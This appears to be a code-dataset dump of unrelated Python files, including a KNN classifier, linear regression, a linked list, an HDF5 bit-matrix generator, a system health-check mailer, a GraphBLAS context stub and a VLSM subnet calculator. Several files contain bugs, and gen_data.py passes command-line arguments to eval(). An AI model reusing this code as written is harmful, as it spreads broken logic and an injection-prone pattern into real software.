intPreprocessedWidth), mode='bilinear', align_corners=False)\n\ttenPreprocessedSecond = torch.nn.functional.interpolate(input=tenPreprocessedSecond, size=(intPreprocessedHeight, intPreprocessedWidth), mode='bilinear', align_corners=False)\n\n\ttenFlow = 20.0 * torch.nn.functional.interpolate(input=netNetwork(tenPreprocessedFirst, tenPreprocessedSecond), size=(intHeight, intWidth), mode='bilinear', align_corners=False)\n\n\ttenFlow[:, 0, :, :] *= float(intWidth) / float(intPreprocessedWidth)\n\ttenFlow[:, 1, :, :] *= float(intHeight) / float(intPreprocessedHeight)\n\n\treturn tenFlow[0, :, :, :].cpu()\n# end","sub_path":"asset/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":12260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"529222389","text":"from .distances import euclidean\nimport numpy\n\nclass KNN:\n\n\tdef __init__(self, k, trainingset, distanceFunction=euclidean):\n\t\tself.k = k\n\t\tself.distf = distanceFunction\n\t\tneighbors = []\n\t\tclss = []\n\t\tfor line in trainingset:\n\t\t\tneighbors += [line[:-1]]\n\t\t\tclss += [line[-1]]\n\t\tself.neighbors = numpy.array(neighbors)\n\t\tself.clss = numpy.array(clss)\n\n\tdef classify(self, datapoint):\n\t\tfrom scipy import stats\n\t\timport copy\n\t\tdist = map(self.distf, repeat(datapoint,len(self.neighbors)), \\\n\t\t self.neighbors)\n\t\tds = copy.copy(dist)\n\t\tdist.sort()\n\t\tclss = []\n\t\tfor i in range(self.k):\n\t\t\tind = ds.index(dist[i])\n\t\t\tclss += [self.clss[ind]]\n\t\treturn int(stats.mode(clss)[0][0])\n\ndef repeat(array, times):\n\tr = []\n\tfor i in range(0, times):\n\t\tr += [array]\n\treturn r\n","sub_path":"pyRecog/distbased/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"280368113","text":"# https://machinelearningmastery.com/implement-simple-linear-regression-scratch-python/\n\nfrom math import sqrt\n\n\ndef mean(x):\n return sum(x) / len(x)\n\n\ndef variance(x):\n mean_ = mean(x)\n return sum([(i - mean_)**2 for i in x])\n\n\ndef covariance(x, y):\n x_mean = mean(x)\n y_mean = mean(y)\n covar = 0.0\n for i in range(len(x)):\n covar += (x[i] - x_mean) * (y[i] - y_mean)\n return covar\n\n\ndef coefs(X):\n x = [row[0] for row in X]\n y = [row[1] for row in X]\n x_mean, y_mean = mean(x), mean(y)\n b1 = covariance(x, y) / variance(x)\n b0 = y_mean - b1 * x_mean\n return [b0, b1]\n\n\ndef rmse(true, predicted):\n loss = 0.0\n for i in range(len(true)):\n loss += ((predicted[i] - true[i])**2)\n return sqrt(loss/len(true))\n\n\ndef linear_regression(train, test):\n predictions = []\n b0, b1 = coefs(train)\n for row in test:\n predictions.append(b0 + b1 * row[0])\n return predictions\n\n\ndataset = [[1, 1], [2, 3], [4, 3], [3, 2], [5, 5]]\n","sub_path":"src/linear-regression.py","file_name":"linear-regression.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"99704188","text":"#!/bin/python\nimport os\nimport sys\nimport re\n\n\ndef dir_filter(path, f_regex, d_regex, f_sid=1, d_sid=1):\n\t\"\"\"\n\tretunrs sorted all matching files, including matching dirs and their files\n\tthe `*_regex` ist the regulare expression used to match `*_sid` the index of the\n\tgroup used to extract the sorting key\n\t`f_*` stands for file related configuration \n\t`d_*` stands for dir related configuration\n\tnote the key has to be convertable to int!\n\t\"\"\"\n\tresult = {}\n\tfor item in os.listdir(path):\n\t\tfitem = os.path.join(path, item)\n\t\tif os.path.isfile(fitem):\n\t\t\tm = f_regex.match(item)\n\t\t\tif m:\n\t\t\t\tresult[int(m.group(f_sid))] = fitem\n\t\telif os.path.isdir(fitem):\n\t\t\tm = d_regex.match(item)\n\t\t\tif m:\n\t\t\t\tresult[int(m.group(d_sid))] = dir_filter(fitem, f_regex, d_regex)\n\treturn result\n\ndef sort_and_flaten(diclist): \n\tresult = []\n\tfor key in sorted(diclist.keys()):\n\t\tvalue = diclist[key]\n\t\tif isinstance(value, dict):\n\t\t\tresult += sort_and_flaten(value)\n\t\telse:\n\t\t\tresult.append(value)\n\treturn result\n\ndef str_latex_input(listing):\n\tprints = map(lambda x: \"\\\\input{\"+x+\"}\", listing)\n\treturn os.linesep.join(prints)\n\t\ndef write_latex_input(target, listing):\n\twith open(target,'w') as f:\n\t\tf.write(\"%%automaticly generated latex include file\"+os.linesep)\n\t\tf.write(str_latex_input(listing))\n\n\nif __name__ == '__main__':\n\t\n\tif len(sys.argv) != 5: \n\t\tprint(\"invalide syntax\")\n\t\tprint(\"python setupFiles.py \")\n\t\texit(1)\n\n\tinclude_regex = re.compile(sys.argv[1]+sys.argv[2])\n\tinclude_dir_regex = re.compile(sys.argv[1])\n\ttarget = sys.argv[3]\n\tpath = sys.argv[4]\n\n\twrite_latex_input( \n\t\ttarget, \n\t\tsort_and_flaten( \n\t\t\tdir_filter(\n\t\t\t\tpath, \n\t\t\t\tinclude_regex, \n\t\t\t\tinclude_dir_regex\n\t\t\t)\n\t\t)\n\t)\n\n","sub_path":"setupFiles.py","file_name":"setupFiles.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"285941855","text":"class doubly_linked_chain:\n ''' A chain of containers linked together by pointers without order. '''\n\n \n class node:\n ''' A container with two pointers one pointing to the previous one pointing to the next element.\n A new node is created by giving it an an item and the two links.\n Example: node(previous Node, item, next node)\n The searchkey for a node is its item if its a single value or its first object if it's a list.'''\n def __init__(self,prevNode,item,nextNode, searchKey = 0):\n self.next = nextNode\n self.prev = prevNode\n self.item = item\n if searchKey == 0:\n self.searchKey = item\n if type(item) == type([]):\n self.searchKey = item[0]\n else:\n self.searchKey = searchKey\n\n \n \n def __init__(self):\n dummy_head_node = self.node(None,None,None) #a dummy head Node to prevent the special case of inserting at the head.\n self.headPtr = dummy_head_node\n self.tailPtr = dummy_head_node\n self.length = 0\n\n def __reset_tailPtr(self):\n ''' Sets the tail pointer to the last Position again in case something is added or removed from the tail of the chain. '''\n def isLastNode(node):\n if node.next == None:\n return node\n self.tailPtr = self.traverse(isLastNode)\n \n\n def insert(self,item, searchkey=0):\n ''' Adds an item to the front of the chain after the dummy head node.'''\n dummyHeadNode = self.headPtr\n nextNode = dummyHeadNode.next\n tmpNode = self.node(dummyHeadNode,item,dummyHeadNode.next,searchkey)\n dummyHeadNode.next = tmpNode\n if nextNode != None:\n nextNode.prev = tmpNode\n self.length +=1\n self.__reset_tailPtr()\n\n\n def traverse(self,visit):\n ''' Traverses the chain from the head to the tail calling visit(current node) at each node.\n If visit is a fruitfull function the traversal will be stopped when another value than\n None is returned and the by visit returned value will be returned by traverse().\n '''\n tmpNode = self.headPtr\n tmpNode = tmpNode.next #skip the dummy head node\n while tmpNode != None:\n tmp = visit(tmpNode)\n if tmp != None:\n return tmp\n tmpNode = tmpNode.next\n\n def remove(self,searchKey):\n ''' Removes the first node with the given searchkey from the chain.\n The method returns True if it was successfull or False if not.\n '''\n tmp = self.getNode(searchKey)\n \n if tmp == None:\n return False\n prevNode = tmp.prev\n nextNode = tmp.next\n prevNode.next = nextNode\n if nextNode != None:\n nextNode.prev = prevNode\n self.length -=1\n self.__reset_tailPtr()\n return True\n\n\n def clear(self):\n ''' Removes all the nodes from the chain except for the dummy head node. '''\n dummyHeadNode = self.headPtr\n dummyHeadNode.next = None\n self.tailPtr = dummyHeadNode\n \n\n def getNode(self,searchKey):\n ''' Returns the first node found with the given searchkey.'''\n def compare(node):\n if node.searchKey == searchKey:\n return node\n return self.traverse(compare)\n\n def getItem(self, searchKey):\n ''' Returns the first item found with the given searchkey. '''\n node = self.getNode(searchKey)\n if node:\n return node.item\n else:\n return False\n\n def isEmpty(self):\n ''' Returns True if the chain is empty or false if not. '''\n if self.tailPtr is None:\n return True\n return False\n\n def getTraverse(self):\n ''' returns a list of all the items in the chain '''\n tmpList = []\n tmpNode = self.headPtr\n tmpNode = tmpNode.next #skip the dummy head node\n while tmpNode != None:\n tmpList.append(tmpNode.item)\n tmpNode = tmpNode.next\n return tmpList\n\n","sub_path":"Main (python code)/ADT/Table/doubly_linked_chain.py","file_name":"doubly_linked_chain.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"218896823","text":"import numpy as np\nimport datetime\nimport h5py\nimport sys\nimport argparse\nfrom time import time\nimport re\nimport os\n\nparameter_help = \"\"\"\nDataset Info\n------------\n\nseed : int64; default = 65536\n A value to initiate the random number generator. Setting to 0 will result in random seed generation based on current time.\n\nvector_length : int\n Number of elements per vector (a.k.a \"vector length\"), determines number of columns in the matrix\n\nvector_count : int\n Number of vectors to be generated, equal to number of rows in the matrix\n\nstorage : [\"bool\", \"byte\", \"uint32\"]; default = \"byte\"\n The format in which the values should be stored.\n bool: matrices are stored as bool values, single element contains single value\n byte: matrices are stored as byte/int8, single element contains 8 values (vector_length must be divisible by 8)\n uint32: matrices are stored as uint32, single element contains 32 values (vector_length must be divisible by 32)\n\nrandomization : [\"mutate\", \"full\", \"sparse\"]; default = \"mutate\"\n The way the vectors are generated.\n mutate: the template vector is generated randomly and then a percentage of the values are randomly changed to generate each vector in the matrix\n full: all vectors are completely randomly generated\n sparse: the template vector is set to zeros; the vectors in the matrix are generated by activating a percentage of random bits\n\nactive_fraction : float in range (0, 1); default 0.2\n This value is used if randomization is set to \"mutate\" or \"sparse\" as the fraction (\"percentage\") to determine how many bits should be manipulated.\n\nrandom_fraction : float in range (0, 1); default 0.0\n !!! not implemented yet !!!\n Additional randomization for the active_fraction parameter. If above zero, the active fraction is not fixed but randomly shifted by up to \n amount. E.g., if active_fraction=0.5 and random_fraction=0.2, the active fraction for each vector will be randomly selected from range (0.3, 0.7).\n\nuse_fletcher : bool; default = True\n\"\"\"\n\n# generate random seed\ncurrent_dt = datetime.datetime.now()\n# seed = int(current_dt.timestamp())\nseed = 65536\n\nstamp = current_dt.strftime(\"%Y-%m-%d_%H-%M-%S\")\n\nuse_fletcher = True\ncompression_level = 3\n\ndatapath = \"data\"\nstorage_types = [\"bool\", \"byte\", \"uint32\"]\n\nprint(f\"Initializing dataset generation with seed: {seed} at {stamp}.\")\n\ninfo = {\n \"alg_version\": 0.2, # for forward compatibility only\n \"seed\": seed,\n \"vector_length\": int(2**18),\n \"vector_count\": int(1e4),\n \"storage\": \"uint32\",\n \"randomization\": \"mutate\",\n \"active_fraction\": 0.2,\n \"random_fraction\": 0.0,\n \"stamp\": stamp,\n \"use_fletcher\": use_fletcher,\n \"compression_level\": compression_level\n}\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"n_vector\", help=\"Number of vectors in data. Python expressions can be used, i.e. 1e3 == 1000.\")\nparser.add_argument(\"n_elements\", help=\"Number of elements in each vector (i.e. vector length). Python expressions can be used, i.e. 2**16 == 65536\")\nparser.add_argument(\"--path\", \"-p\", default=datapath,\n help=f\"Path to the data folder. (default = 'data')\")\nparser.add_argument(\"--storages\", \"-s\", choices=storage_types, action=\"append\", default=[],\n help=f\"Choose which storage types to generate. Can be used multiple times to generate multiple storage types.\")\n\nargs = parser.parse_args()\n\ndatapath = args.path\nstorages = args.storages\ninfo[\"vector_count\"] = int(eval(args.n_vector))\ninfo[\"vector_length\"] = int(eval(args.n_elements))\n\n# for (k, v) in info.items():\n# ma, mb = re.search(r\"^(\\w)\", k), re.search(r\"_?(?<=\\_)(\\w)\", k)\n# short = \"-\" + ma.group(0) + (mb.group(1) if mb is not None else \"\")\n\n# parser.add_argument(\"--\" + k, short)\n\ndef activate(x, f, s):\n \"\"\"Activate \"f\" fraction of total \"s\" bits in the array \"x\"\n \"\"\"\n x[rng.choice(s, int(f*s), False)] = True\n return x\n\n\ndef mutate(x, f, s):\n \"\"\"Mutate \"f\" fraction of total \"s\" bits in the array \"x\"\n \"\"\"\n x[rng.choice(s, int(f*s), False)] ^= True\n return x\n\n\nfor storage in storages:\n info[\"storage\"] = storage\n\n print(f\"Settings:\\n- number of vectors: {info['vector_count']}\\n- vector length: {info['vector_length']}\\n- storage type: {info['storage']}\"\n + \"\\n- randomization method: {info['randomization']}\\n- active fraction: {info['active_fraction']}\\n- random fraction: {info['random_fraction']}\"\n + \"\\n- version: {info['version']}\")\n\n rng = np.random.RandomState(info[\"seed\"])\n\n vector_shape = (int(info[\"vector_length\"]), 1)\n matrix_shape = (int(info[\"vector_count\"]), int(info[\"vector_length\"]))\n rng_max_val = 2\n dtype = np.bool\n\n # old version\n # if info[\"storage\"] == \"bool\":\n # vector_shape = (info[\"vector_length\"], 1)\n # matrix_shape = (info[\"vector_count\"], info[\"vector_length\"])\n # rng_max_val = 2\n # dtype = np.bool\n # elif info[\"storage\"] == \"byte\":\n # if info[\"vector_length\"] % 8 != 0:\n # raise Exception(\"The parameter must be divisible by 8 when using 'byte' !\")\n # vector_shape = (info[\"vector_length\"] >> 3, 1)\n # matrix_shape = (info[\"vector_count\"] >> 3, info[\"vector_length\"])\n # rng_max_val = 8\n # dtype = np.bool\n # elif info[\"storage\"] == \"uint32\":\n # if info[\"vector_length\"] % 32 != 0:\n # raise Exception(\"The parameter must be divisible by 32 when using 'uint32' !\")\n # vector_shape = (info[\"vector_length\"] >> 5, 1)\n # matrix_shape = (info[\"vector_count\"] >> 5, info[\"vector_length\"])\n # rng_max_val = 32\n # dtype = np.bool\n # else:\n # raise Exception(f\"Unknown storage type: {info['storage']}!\")\n\n\n print(\"Generating data...\")\n\n if info[\"randomization\"] == \"full\":\n # do full randomization\n vector = rng.randint(0, rng_max_val, vector_shape, dtype)\n matrix = rng.randint(0, rng_max_val, matrix_shape, dtype)\n elif info[\"randomization\"] == \"mutate\":\n vector = rng.randint(0, rng_max_val, vector_shape, dtype)\n matrix = np.tile(vector.T, (matrix_shape[0], 1))\n matrix = np.apply_along_axis(mutate, 0, matrix.T, info[\"active_fraction\"], info[\"vector_length\"]).T\n elif info[\"randomization\"] == \"sparse\":\n vector = np.zeros(vector_shape, dtype=dtype)\n matrix = np.zeros(matrix_shape, dtype=dtype)\n matrix = np.apply_along_axis(activate, 0, matrix.T, 0, info[\"active_fraction\"], info[\"vector_length\"]).T\n else:\n raise Exception(f\"Unknown randomization method {info['randomization']}!\")\n\n print(\"Data generation complete. Compressing data (if necessary).\")\n # compress\n order = sys.byteorder\n if info[\"storage\"] == \"bool\":\n pass # no compression\n elif info[\"storage\"] == \"byte\":\n if info[\"vector_length\"] % 8 != 0:\n raise Exception(\"The parameter 'vector_length' must be divisible by 8 when using 'byte' storage!\")\n matrix = np.packbits(matrix, 1, bitorder=\"big\").reshape(matrix_shape[0], vector_shape[0] >> 3)\n vector = np.packbits(vector, bitorder=\"big\")[:, np.newaxis]\n elif info[\"storage\"] == \"uint32\":\n if info[\"vector_length\"] % 32 != 0:\n raise Exception(\"The parameter 'vector_length' must be divisible by 32 when using 'uint32' storage!\")\n if order == \"little\":\n matrix = np.packbits(matrix.reshape(-1, 4, 8)[:, ::-1], bitorder=\"big\").view(np.uint32).reshape(matrix_shape[0], vector_shape[0] >> 5)\n vector = np.packbits(vector.reshape(-1, 4, 8)[:, ::-1], bitorder=\"big\").view(np.uint32)[:, np.newaxis]\n else:\n matrix = np.packbits(matrix.reshape(-1, 4, 8), bitorder=\"big\").view(np.uint32).reshape(matrix_shape[0], vector_shape[0] >> 5)\n vector = np.packbits(vector.reshape(-1, 4, 8), bitorder=\"big\").view(np.uint32)[:, np.newaxis]\n else:\n raise Exception(f\"Unknown storage type: {info['storage']}!\")\n\n filename = os.path.join(datapath, f\"bits_{info['vector_count']}x{info['vector_length']}_{info['storage']}_{info['randomization']}.hdf5\")\n print(f\"Saving data to {filename}.\")\n with h5py.File(filename, \"w\") as f:\n f.attrs.update(**info)\n now = time()\n f.create_dataset(\"vector\", data=vector, compression=\"gzip\", compression_opts=compression_level, fletcher32=use_fletcher)\n vector_saving_runtime = time() - now\n print(f\"Vector saved. Saving time was {vector_saving_runtime}s. Estimated matrix saving time: {vector_saving_runtime * matrix_shape[0]}s.\")\n f.create_dataset(\"matrix\", data=matrix, compression=\"gzip\", compression_opts=compression_level, fletcher32=use_fletcher)\n\n print(\"Done.\")\n","sub_path":"gen_data.py","file_name":"gen_data.py","file_ext":"py","file_size_in_byte":8786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"334905356","text":"#!/usr/bin/env python3\r\n\r\nimport psutil,shutil,socket,emails\r\n\r\ndef error_mail(sub):\r\n\tsender = \"automation@example.com\"\r\n\treceipient = \"student-02-5fcba15d24c9@example.com\"\r\n\tsubject=sub\r\n\tbody=\"Please check your system and resolve the issue as soon as possible.\"\r\n\tmessage=emails.generate_error_email(sender,receipent,subject,body)\r\n\temails.send_email(message)\r\n\r\ndef check_cpu_usage():\r\n\tusage=psutil.cpu_percent(1)\r\n\tif usage>80:\r\n\t\tsub=\"Error - CPU usage is over 80%\"\r\n\t\terror_mail(sub)\r\n\r\ndef check_disk_usage():\r\n\tdu=shutil.disk_usage(\"/\")\r\n\tfree=du.free/du.total*100\r\n\tif free<20:\r\n\t\tsub=\"Error - Available disk space is less than 20%\"\r\n\t\terror_mail(sub)\r\n\r\ndef check_mem():\r\n\tmemory=dict(psutil.virtual_memory()._asdict())[\"available\"]\r\n\tavailable_mem=(memory/1024)/1024\r\n\tif available_mem<500:\r\n\t\tsub=\"Error - Available memory is less than 500MB\"\r\n\t\terror_mail(sub)\r\n\r\ndef check_host():\r\n\tip=socket.gethostbyname(\"localhost\")\r\n\tif ip!=\"127.0.0.1\":\r\n\t\tsub=\"Error - localhost cannot be resolved to 127.0.0.1\"\r\n\t\terror_mail(sub)\r\n\r\nif __name__ == \"__main__\":\r\n\tcheck_cpu_usage()\r\n\tcheck_disk_usage()\r\n\tcheck_mem()\r\n\tcheck_host()","sub_path":"Automate updating catalog information/health_check.py","file_name":"health_check.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"9634014","text":"from functools import wraps\nfrom .exceptions import return_error, GraphBlasException, GrB_Info\n\n\nclass GrB_Mode:\n GrB_BLOCKING = object()\n GrB_NONBLOCKING = object()\n\n\n# Decorator to automatically catch exceptions and return GrB_PANIC\n# Also ensures context is set\ndef handle_panic(func):\n @wraps(func)\n def new_func(*args, **kwargs):\n try:\n if global_context is None:\n raise GraphBlasException(\"Context has not be initialized\")\n return func(*args, **kwargs)\n except Exception as e:\n return_error(GrB_Info.GrB_PANIC, str(e))\n\n return new_func\n\n\nglobal_context = None\n\n\nclass Context:\n def __init__(self, mode):\n self._mode = mode\n\n @property\n def mode(self):\n return self._mode\n\n\ndef GrB_init(mode):\n try:\n global global_context\n if mode is not GrB_Mode.GrB_BLOCKING and mode is not GrB_Mode.GrB_NONBLOCKING:\n return_error(GrB_Info.GrB_INVALID_VALUE)\n if global_context is not None:\n return_error(GrB_Info.GrB_INVALID_VALUE, \"Context has already been initialized\")\n elif global_context.mode is None:\n return_error(\n GrB_Info.GrB_INVALID_VALUE, \"Context has been finalized and cannot be reused\",\n )\n global_context = Context(mode)\n return GrB_Info.GrB_SUCCESS\n except Exception as e:\n return_error(GrB_Info.GrB_PANIC, str(e))\n\n\ndef GrB_finalize():\n try:\n global global_context\n if global_context is None:\n raise GraphBlasException(\"Context is not initialized\")\n global_context._mode = None\n return GrB_Info.GrB_SUCCESS\n except Exception as e:\n return_error(GrB_Info.GrB_PANIC, str(e))\n\n\ndef GrB_wait(obj=None):\n # We don't currently implement non-blocking mode, so always return success\n return GrB_Info.GrB_SUCCESS\n\n\ndef GrB_getVersion(version_ptr, subversion_ptr):\n try:\n version_ptr[0] = 1\n subversion_ptr[0] = 1\n except Exception as e:\n return_error(GrB_Info.GrB_PANIC, str(e))\n","sub_path":"grblas/backends/python/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"226869625","text":"# |`-:_\n# ,----....____ | `+.\n# ( ````----....|___ |\n# \\ _ ````----....____\n# \\ _) ```---.._\n# \\ \\\n# )`.\\ )`. )`. )`. )`. )`. )`. )`. )`. )`. )\n# -' `-' `-' `-' `-' `-' `-' `-' `-' `-' `-' `\n# The Sub: Expeditionary VLSM Calculator\n# Documentation at: https://github.com/TheMagicNacho\n# v0.1.3\n# TODO: Add Max available subnet validator\n# ------------------------------------------------\n# from tabulate import tabulate\n\n\ndef main(): # Main function loops through user input, calculations, and input validation.\n try:\n usr_input_network = init_input() # Gather user input\n input_user_db, input_labels_db = mask_input(usr_input_network) # Build the databases\n db = vlsm(input_user_db, input_labels_db)\n try: # Pints fully formatted calculations.\n printer(db, input_user_db)\n printer_lite(db, input_user_db)\n except: # Prints only CSV because tabulate module is missing.\n print('!!!TABULATE MODULE MISSING. USE CSV!!!')\n printer_lite(db, input_user_db)\n except: # Restarts in the event of impassable error.\n print('RESTART: General Error.')\n main()\n\n\ndef vlsm(input_user_db, input_labels_db): # Primary manager for calculating operations\n og = dict(net_common_name='name', hosts_req=0, hosts_avail=0, hosts_unused=0, net_add=[0, 0, 0, 0], cidr=0,\n sub_mask=[0, 0, 0, 0], sub_start=[0, 0, 0, 0], sub_end=[0, 0, 0, 0], sub_broad=[0, 0, 0, 0],\n sub_wild=[0, 0, 0, 0], sub_delta_r=0)\n n_nets = range(0, input_user_db[0])\n db = {}\n for i in n_nets:\n db[i] = og.copy()\n db[i]['net_common_name'] = input_labels_db[i][0]\n db[i]['hosts_req'] = input_labels_db[i][1]\n if i == 0: # Establish first subnet\n db[0]['net_add'] = input_user_db[1].copy() # Initial net address comes from user input.\n db[0]['cidr'] = int(find_slash(db[0].get('hosts_req'))) # Find the CIDR if dotted decimal is inputed, convert to CIDR\n db[0]['hosts_avail'] = int(find_hosts(db[0].get('cidr')))\n db[0]['hosts_unused'] = db[i].get('hosts_avail') - db[0].get('hosts_req')\n db[0]['sub_mask'] = find_mask(db[0].get('cidr'))\n db[0]['sub_delta_r'] = db[0].get('hosts_avail') + 2\n db[0]['sub_start'] = find_start(db[0], db[0].get('net_add'))\n db[0]['sub_wild'] = find_wildcard(db[0].get('sub_mask'))\n db[0]['sub_broad'] = find_broadcast(db[0].get('sub_wild'), db[0].get('net_add'))\n db[0]['sub_end'] = find_end(db[0], db[0].get('sub_broad'))\n\n\n else: # Operate upon subsequent sub-nets\n db[i]['cidr'] = int(find_slash(db[i].get('hosts_req'))) # Input CIDR from previous calculations\n db[i]['sub_mask'] = find_mask(db[i].get('cidr'))\n db[i]['net_add'] = find_net(db[i], db[i - 1].get('sub_broad'))\n db[i]['hosts_avail'] = int(find_hosts(db[i].get('cidr')))\n db[i]['hosts_unused'] = db[i].get('hosts_avail') - db[i].get('hosts_req')\n db[i]['sub_delta_r'] = db[i].get('hosts_avail') + 2\n db[i]['sub_start'] = find_start(db[i], db[i].get('net_add'))\n db[i]['sub_wild'] = find_wildcard(db[i].get('sub_mask'))\n db[i]['sub_broad'] = find_broadcast(db[i].get('sub_wild'), db[i].get('net_add'))\n db[i]['sub_end'] = find_end(db[i], db[i].get('sub_broad'))\n return db\n\n\ndef find_start(db, net_add): # Operates similarly to the find_net. Input: network Address / Output: Start\n if net_add[3] <= 254:\n db['sub_start'][3] = net_add[3] + 1\n db['sub_start'][2] = net_add[2]\n db['sub_start'][1] = net_add[1]\n db['sub_start'][0] = net_add[0]\n elif net_add[2] <= 254:\n db['sub_start'][3] = int(0)\n db['sub_start'][2] = net_add[2] + 1\n db['sub_start'][1] = net_add[1]\n db['sub_start'][0] = net_add[0]\n elif net_add[1] <= 254:\n db['sub_start'][3] = int(0)\n db['sub_start'][2] = int(0)\n db['sub_start'][1] = net_add[1] + 1\n db['sub_start'][0] = net_add[0]\n else:\n db['sub_start'][3] = int(0)\n db['sub_start'][2] = int(0)\n db['sub_start'][1] = int(0)\n db['sub_start'][0] = net_add[1] + 1\n\n start = db['sub_start'].copy()\n return start\n\n\ndef find_end(db, net_broad):\n db['sub_end'][3] = net_broad[3] - 1\n for b in range(0, 2):\n db['sub_end'][b] = net_broad[b]\n end = db['sub_end'].copy()\n return end\n\n\ndef find_slash(sn_hosts): # Used to find the CIDR for subnets past the initial subnet.\n for i in range(0, sn_hosts):\n x = 2 ** i\n if x > sn_hosts + 2:\n return 32 - i\n else:\n continue\n\n\ndef return_ip_net_array(input_network):\n b = [int(i) for i in input_network.split('.')]\n return b\n\n\ndef return_mask_normalized(input_mask):\n if '.' in input_mask:\n mask_given = [int(i) for i in input_mask.split('.')]\n return mask_given\n else:\n cidr = input_mask.replace('/', '')\n mask_from_cidr = find_mask(cidr)\n mask_found = mask_from_cidr\n return mask_found\n\n\ndef return_cidr_normalized(input_cidr):\n mask = input_cidr.split('.')\n if '/' in input_cidr:\n cidr_given = int(input_cidr.replace('/', ''))\n if cidr_given <= int(32):\n return cidr_given\n else:\n print('RESTART: CIDR must be less than 32')\n main()\n elif int(input_cidr):\n input_cidrx = int(input_cidr)\n if input_cidrx <= 32:\n return input_cidrx\n else:\n print('RESTART: CIDR must be less than 32')\n main()\n\n elif len(mask) == 4:\n for i in range(0, 4):\n maskx = input_cidr[i]\n if int(maskx) <= int(255):\n mask_array = [int(i) for i in input_cidr.split('.')]\n return dec_to_bin(mask_array)\n else:\n print('RESTART: Error with mask octett {}'.format(maskx[i]))\n main()\n else:\n print('RESTART General Error with Subnet Mask')\n main()\n\n\ndef dec_to_bin(mask_array): # Create binary array from function input\n mask_bin = []\n for i in range(0, 4):\n z = str(bin(mask_array[i]).replace(\"0b\", \"\"))\n x = z.count('1')\n mask_bin.insert(i, x)\n return sum(mask_bin)\n\n\ndef find_hosts(found_cidr):\n x = 32 - int(found_cidr)\n return (2 ** x) - 2\n\n\ndef find_mask(c): # Create the sub-net mask by using the CIDR. Only called if CIDR is provided by user.\n array_mask = []\n for i in range(0, 4):\n array_mask.append(i)\n c = int(c)\n if c < 8:\n w = 32 - (c + 24)\n array_mask[0] = 256 - 2 ** w\n array_mask[1] = 0\n array_mask[2] = 0\n array_mask[3] = 0\n\n else:\n if c < 16:\n x = 32 - (c + 16)\n array_mask[0] = 255\n array_mask[1] = 256 - (2 ** x)\n array_mask[2] = 0\n array_mask[3] = 0\n else:\n if c < 24:\n y = 32 - (c + 8)\n array_mask[0] = 255\n array_mask[1] = 255\n array_mask[2] = 256 - (2 ** y)\n array_mask[3] = 0\n else:\n z = 32 - c\n array_mask[0] = 255\n array_mask[1] = 255\n array_mask[2] = 255\n array_mask[3] = 256 - (2 ** z)\n return array_mask\n\n## Hidden function. This works, but is not very reliable. Using a more robust function title: find_net / Keeping for possible usage in the future.\n# def find_net_add(net, mask):\n# c = [1, 1, 1, 1] # Temporary, colapsable database\n# for i in range(0, 4):\n# c[i] = net[i] & mask[i] # AND the network and the mask\n# return c\n\n\ndef find_net(db, net_add): # Outputs the network address. Input: Broadcast Process: If within range add 1 to octett. Output: Updated network.\n if net_add[3] <= 254:\n db['net_add'][3] = net_add[3] + 1\n db['net_add'][2] = net_add[2]\n db['net_add'][1] = net_add[1]\n db['net_add'][0] = net_add[0]\n elif net_add[2] <= 254:\n db['net_add'][3] = int(0)\n db['net_add'][2] = net_add[2] + 1\n db['net_add'][1] = net_add[1]\n db['net_add'][0] = net_add[0]\n elif net_add[1] <= 254:\n db['net_add'][3] = int(0)\n db['net_add'][2] = int(0)\n db['net_add'][1] = net_add[1] + 1\n db['net_add'][0] = net_add[0]\n else:\n db['net_add'][3] = int(0)\n db['net_add'][2] = int(0)\n db['net_add'][1] = int(0)\n db['net_add'][0] = net_add[1] + 1\n\n start = db['net_add'].copy()\n return start\n\n\ndef find_wildcard(sub_mask):\n c = [1, 1, 1, 1] # Temporary, colapsable database\n for b in range(0, 4):\n c[b] = 255 - sub_mask[b]\n return c\n\n\ndef find_broadcast(wildcard, net_add):\n d = [1, 1, 1, 1] # Temporary, colapsable database\n for i in range(0, 4):\n d[i] = wildcard[i] | int(net_add[i]) # OR operation\n return d\n\n\ndef printer(db, u): # Pretty print the the information.\n table = []\n print('\\n')\n for i in range(0, u[0]):\n table.append(db[i].values())\n headers = db[0].keys()\n print(tabulate(table, headers, tablefmt=\"pipe\", stralign='center', numalign='left'))\n\n\ndef printer_lite(db, input_user_db): # Create the CSV format of information.\n table = []\n print('\\nCSV FORMAT\\n***Copy and Paste the following into a .txt then import the file to excel. Delimitator is colon \":\" ***')\n for i in range(0, 60):\n print(\"=\", end='=')\n print('\\n')\n for header in db[0].keys():\n print(header, end=':')\n print('\\n')\n for i in range(0, input_user_db[0]):\n table.append(db[i].values())\n x = table[i]\n y = list(x)\n for j in range(0, len(y)):\n d = y[j]\n print(d, end=':')\n print('\\n')\n main()\n\n\ndef validate_ip(ip): # Validate IP. If not valid IP, return feedback then restart the program.\n ip = ip.split('.')\n try:\n for i in range(0, 4):\n ipx = ip[i]\n if ipx.isalpha():\n print('RESTART: Error with octett {}'.format(ip[i]))\n print('IP must be integer with \".\" between octett.')\n main()\n elif int(ipx) <= int(255) and not ipx.isalpha():\n if len(ip) == 4:\n pass\n else:\n print('RESTART: IP address too short.')\n main()\n else:\n print('RESTART: Error with octett {}'.format(ip[i]))\n main()\n except:\n print('RESTART: General error with Net IP. Verify entry is correct.')\n main()\n\n\ndef pre_process(input_network, input_mask, n_nets): # Apply required 